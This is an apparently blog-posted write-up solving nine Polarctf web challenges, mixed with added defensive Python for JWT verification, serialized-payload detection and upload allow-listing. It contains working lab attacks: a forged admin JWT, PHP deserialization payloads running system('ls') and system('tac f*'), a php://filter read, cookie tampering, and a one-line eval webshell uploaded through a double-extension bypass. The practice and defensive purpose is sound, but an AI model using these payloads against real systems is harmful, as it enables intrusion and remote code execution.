
Web Brush Up on the Polarctf Range (2)

Popularity: 733 / 2024-09-22 22:02:13

1. Honey Snow Ice City Ji police store

Opened the range. The challenge says the hidden milk tea (the ninth cup) gives the flag, but only eight cups are shown, so the test is most likely about editing the front-end code.

image

Change id=1 to id=9 in the page source, go back to the page and click "Original Milk Tea" to bring up the flag.

image

#flag{7d43cc8863ad0ee649048e562fde53ec}

2. Summon the Dragon

Opened the range and found it was a game; after a few rounds it was clear the game could not be beaten by playing it.

image

Press F12 to view the page source. One file contains a long string of symbols, which looks like JSFuck (a JavaScript encoding in the spirit of Brainfuck).

image

Run it through a JSFuck decoder to recover the flag:
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}

image

3. flag

Opened the range and pressed F12; the page indicates that the flag is given out. Scanning with dirsearch shows that there are additional files.

image
image

Accessing it gives the third piece, flag3: c0ad71dadd11}

image

Then capture the request in BurpSuite and replay it to see what comes back; this yields the second piece, flag2: 3ca8737a70f029d

image

We notice a Set-Cookie header in the response. Changing the id in it to 1 and resending the request gives flag1: flag{7ac5b

image

Concatenating the three pieces gives the final result: flag{7ac5b3ca8737a70f029dc0ad71dadd11}

4. jwt

Opened the range and found login and registration pages. Guessed that this tests vertical privilege escalation: going from a normal user to the admin user.

image

Register a user, log in and press F12. Since the challenge title is jwt, locate the JWT value and brute-force its secret with a tool, which gives the key: SYSA

An explanation of JWT: a JWT (JSON Web Token) consists of three parts in compact form, separated by dots (.): header, payload and signature.

image

Then decode the JWT value with an online JWT decoder (in an offline competition, split it on the dots and base64-decode each segment).
Next, change the username to admin, sign with the recovered key, and obtain the new JWT value: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_0nnIZfJ1mO50

image

Replace the page's JWT with the new value and reload the page.

image

This escalates our privileges; clicking on the personal center then shows the flag.

image

#flag{ec39c705cfb5295f9dddcedc819a1659}
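
The challenge above (and "deceptive" further down, where the cookie is simply set to admin) both come down to the server trusting client-side state: an unsigned cookie, or a JWT signed with a four-character secret that a brute-force tool recovers. The following Python is an added example, not code from the writeup or the challenge: it does the offline "split on dots and base64-decode each segment" step on the token quoted above, and shows the verification logic a server should run (algorithm pinned to HS256, constant-time comparison) together with a minimum key length that would have made the secret impractical to brute-force. `DEMO_KEY` and the `user` claims are constructed for the demo; only `PAGE_TOKEN` and the key `SYSA` come from the writeup.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Token quoted in the writeup: header and payload decode to HS256 / {"username":"admin"}.
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"
              ".eyJ1c2VybmFtZSI6ImFkbWluIn0"
              ".9avq5ApZ-XZul2kbon8z2cB6Y4bNru_0nnIZfJ1mO50")

# Constructed key for the demo; not the challenge's secret.
DEMO_KEY = b"constructed-demo-key-with-at-least-32-bytes"
MIN_HS256_KEY_BYTES = 32  # RFC 7518 s3.2: HMAC keys should be at least as long as the hash output


def b64url_decode(segment: str) -> bytes:
    """JWTs use base64url without padding: restore the padding, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def split_jwt(token: str):
    """The offline decode the writeup describes: split on '.', base64-decode header and payload."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("a compact JWS has exactly three dot-separated parts")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    return header, payload, parts[2]


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a token, refusing keys short enough to be brute-forced offline (like 'SYSA')."""
    if len(key) < MIN_HS256_KEY_BYTES:
        raise ValueError("HS256 key too short; use at least 32 random bytes")
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the signature verifies under HS256, else None.
    The algorithm is pinned: a header claiming 'none' or anything else is rejected."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
        given = b64url_decode(parts[2])
    except Exception:
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, (parts[0] + "." + parts[1]).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given):
        return None
    return json.loads(b64url_decode(parts[1]))


def swap_payload_keep_signature(token: str, new_claims: dict) -> str:
    """Edit the payload without knowing the key (what an online editor does): the old
    signature no longer covers the new payload, so verification must fail."""
    header, _, sig = token.split(".")
    return header + "." + b64url_encode(json.dumps(new_claims, separators=(",", ":")).encode()) + "." + sig


def demo() -> dict:
    good = sign_hs256({"username": "user"}, DEMO_KEY)
    tampered = swap_payload_keep_signature(good, {"username": "admin"})
    none_alg = b64url_encode(b'{"alg":"none"}') + "." + good.split(".")[1] + "."
    return {
        "page_header": split_jwt(PAGE_TOKEN)[0],
        "page_payload": split_jwt(PAGE_TOKEN)[1],
        "good": verify_hs256(good, DEMO_KEY),
        "tampered": verify_hs256(tampered, DEMO_KEY),
        "none_alg": verify_hs256(none_alg, DEMO_KEY),
    }


if __name__ == "__main__":
    print(demo())
```

The decoded page token shows why the attack is cheap: the only thing binding `username` to the user is the HMAC, and an HMAC over a four-byte secret is recovered in seconds. `sign_hs256` rejects such keys up front, and `verify_hs256` rejects the two classic tampering routes (payload swap with a stale signature, and `alg: none`).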

5. Sign in

I opened the range, and I couldn't get the submit button to work.

image

Sure enough: capture the request in BurpSuite and replay it. The response says a POST request is required, with a parameter named key; the first attempt is key=flag

image
image

Then follow the prompts in each response and adjust the parameter value until the flag is returned.

image

#flag{fa3f77dd58a0a8f990bb6292da75618f}

6. File inclusion

Open the range and capture the request with BurpSuite. The response carries a Set-Cookie parameter, and going by the challenge description we guess a PHP pseudo-protocol (stream wrapper) is involved.

image

Take the base64 ciphertext and decode it in CyberChef.

image

Here we guess that the session file lives in /tmp and is named sess_<sessionid>; the session id is present in the response.

image

Read the flag with cat or tac.

image

#flag{43306e8113f53ece238c0a124432ce19}

7. Don't touch me

Open the range, press F12 and find the hint.

image

Then follow the method given in the F12 hint step by step.

image

Just visit the resulting URL.

image

#flag{0cee5a97f12b172ceeea2e9f67b7413e}

8. very nice

This challenge tests basic deserialization.

image

<?php
// Build the object locally and print its serialized form; the challenge's
// Example class executes whatever $sys holds when the object is unserialized.
class Example
{
    public $sys = "system('ls');";
}
$a = new Example();
echo serialize($a);
?>

# First list all files: O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}

image

The flag file is there. Because including it directly would execute it rather than display it, we use include with the php://filter pseudo-protocol to read it base64-encoded:
<?php
// Same generator, with $sys pointing include() at a php://filter wrapper
class Example
{
    public $sys = "include('php://filter/read=convert.base64-encode/resource=');";
}
$a = new Example();
echo serialize($a);
?>

#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=');";}

image

Base64-decoding the output gives the flag.
#flag{202cb962ac59075b964b07152d234b70}

Referring to a few other solutions online, the flag can also be read directly:

<?php
// Same generator, reading the flag file with tac via a glob
class Example
{
    public $sys = "system('tac f*');";
}
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}

image

#flag{202cb962ac59075b964b07152d234b70}
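
The three payloads above all rely on the same two facts: PHP's serialized format is length-prefixed (`s:13:"..."` must be exactly 13 bytes, or `unserialize()` refuses the data), and the target class executes whatever string lands in `$sys`. The following Python is an added example, not code from the writeup: a small parser for the `O:len:"Class":n:{...}` form with string properties that enforces the length fields the way PHP does, plus a detection helper that flags properties carrying `system(` / `include(` style calls, which is what a WAF rule or log review would look for. `PAGE_PAYLOADS` are the serialized strings quoted above; the `resource=` target of the include payload was not preserved on the page, so its declared length 69 no longer matches and the parser rejects it, which is the check being demonstrated.

```python
# Serialized strings quoted in the writeup.
PAGE_PAYLOADS = [
    'O:7:"Example":1:{s:3:"sys";s:13:"system(\'ls\');";}',
    'O:7:"Example":1:{s:3:"sys";s:17:"system(\'tac f*\');";}',
]
# The include payload as it appears on the page (resource target missing, so 69 is wrong).
PAGE_TRUNCATED_PAYLOAD = (
    'O:7:"Example":1:{s:3:"sys";s:69:'
    '"include(\'php://filter/read=convert.base64-encode/resource=\');";}'
)

# Constructed watch-list of calls a gadget like Example::$sys would execute.
DANGEROUS_CALLS = ("system(", "exec(", "passthru(", "shell_exec(", "eval(", "include(", "require(")


class PhpUnserializeError(ValueError):
    pass


def parse_php_object(blob: str):
    """Parse one PHP serialized object whose properties are all public strings.
    Returns (class_name, {prop: value}). Every declared length is checked against
    the actual byte length, exactly as PHP's unserialize() does before accepting data."""
    data = blob.encode()  # PHP lengths are byte lengths, not character counts
    pos = 0

    def expect(prefix: bytes):
        nonlocal pos
        if not data.startswith(prefix, pos):
            raise PhpUnserializeError(f"expected {prefix!r} at offset {pos}")
        pos += len(prefix)

    def read_int(terminator: bytes) -> int:
        nonlocal pos
        end = data.index(terminator, pos)
        value = int(data[pos:end])
        pos = end + len(terminator)
        return value

    def read_string() -> str:
        nonlocal pos
        expect(b"s:")
        length = read_int(b":")
        expect(b'"')
        raw = data[pos:pos + length]
        pos += length
        if len(raw) != length or not data.startswith(b'";', pos):
            raise PhpUnserializeError(f"declared length {length} does not match the data")
        pos += 2
        return raw.decode()

    expect(b"O:")
    name_len = read_int(b":")
    expect(b'"')
    class_name = data[pos:pos + name_len].decode()
    pos += name_len
    expect(b'":')
    count = read_int(b":")
    expect(b"{")
    props = {}
    for _ in range(count):
        key = read_string()
        props[key] = read_string()
    expect(b"}")
    if pos != len(data):
        raise PhpUnserializeError("trailing data after object")
    return class_name, props


def flag_dangerous(blob: str):
    """Detection helper: parse the blob and return the properties whose value
    contains a call from DANGEROUS_CALLS."""
    class_name, props = parse_php_object(blob)
    hits = {k: v for k, v in props.items() if any(c in v for c in DANGEROUS_CALLS)}
    return class_name, hits


if __name__ == "__main__":
    for p in PAGE_PAYLOADS:
        print(flag_dangerous(p))
```

The length check is worth internalising when hand-crafting or reviewing payloads: an off-by-one in `s:NN` makes `unserialize()` return false, which is often why a payload "does nothing". On the defensive side, the real fix is not to pass attacker-controlled data to `unserialize()` at all (or to use `allowed_classes`), but a parser like this is enough to surface such payloads in request logs.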

9. deceptive

Capture the request, change the cookie value to admin, and the flag comes back.

image

#flag{10e35c76602b330149ef009e0b484d8f}

Opened the range and found a file upload meant for a webshell (木马); the code hides a blacklist.

image

Auditing the code shows the check can be bypassed by double-writing the file extension.

image

One-line webshell (一句话木马):
<?php @eval($_POST['aaa']);?>

image

Then connect to it with AntSword (中国蚁剑).

image

#flag{a89f40341f4271659154829a2215f428}
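
The "double-writing" bypass works against a blacklist that deletes the forbidden token from the filename: `pphphp` loses its inner `php` and what remains is `php` again. The Python below is an added example, not the challenge's code (which the page does not show): `weak_filter` is the assumed shape of that check, mirroring a single-pass `str_replace`, and `safe_extension` is the allow-list check that should replace it. The `BLACKLIST` and `ALLOWED_EXTENSIONS` values are constructed for the demo.

```python
import os
from typing import Optional

# Constructed lists for the demo; the challenge's real blacklist is not shown on the page.
BLACKLIST = ("phtml", "php", "phar")
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def weak_filter(filename: str) -> str:
    """Assumed shape of the vulnerable check: delete every blacklisted token from the
    name (PHP's str_replace behaves the same way). The replacement is not repeated,
    so 'shell.pphphp' becomes 'shell.php' after the inner 'php' is removed."""
    name = filename
    for bad in BLACKLIST:
        name = name.replace(bad, "")
    return name


def safe_extension(filename: str) -> Optional[str]:
    """Hardened check. Returns the validated extension, or None to reject:
    - no path components (basename must equal the given name),
    - case-folded, and only the LAST extension counts,
    - that extension must be on the allow-list,
    - and no blacklisted token may appear anywhere in the name, so
      'shell.php.jpg' and 'shell.pphphp' are both refused."""
    if filename != os.path.basename(filename):
        return None
    name = filename.lower()
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or ext not in ALLOWED_EXTENSIONS:
        return None
    if any(bad in name for bad in BLACKLIST):
        return None
    return ext


if __name__ == "__main__":
    for candidate in ("shell.pphphp", "shell.php.jpg", "cat.jpg", "CAT.JPG", "../cat.jpg"):
        print(candidate, "->", weak_filter(candidate), "|", safe_extension(candidate))
```

Even with `safe_extension`, the stored file should get a server-generated name and live in a directory the web server does not execute; the extension check only decides whether the upload is accepted.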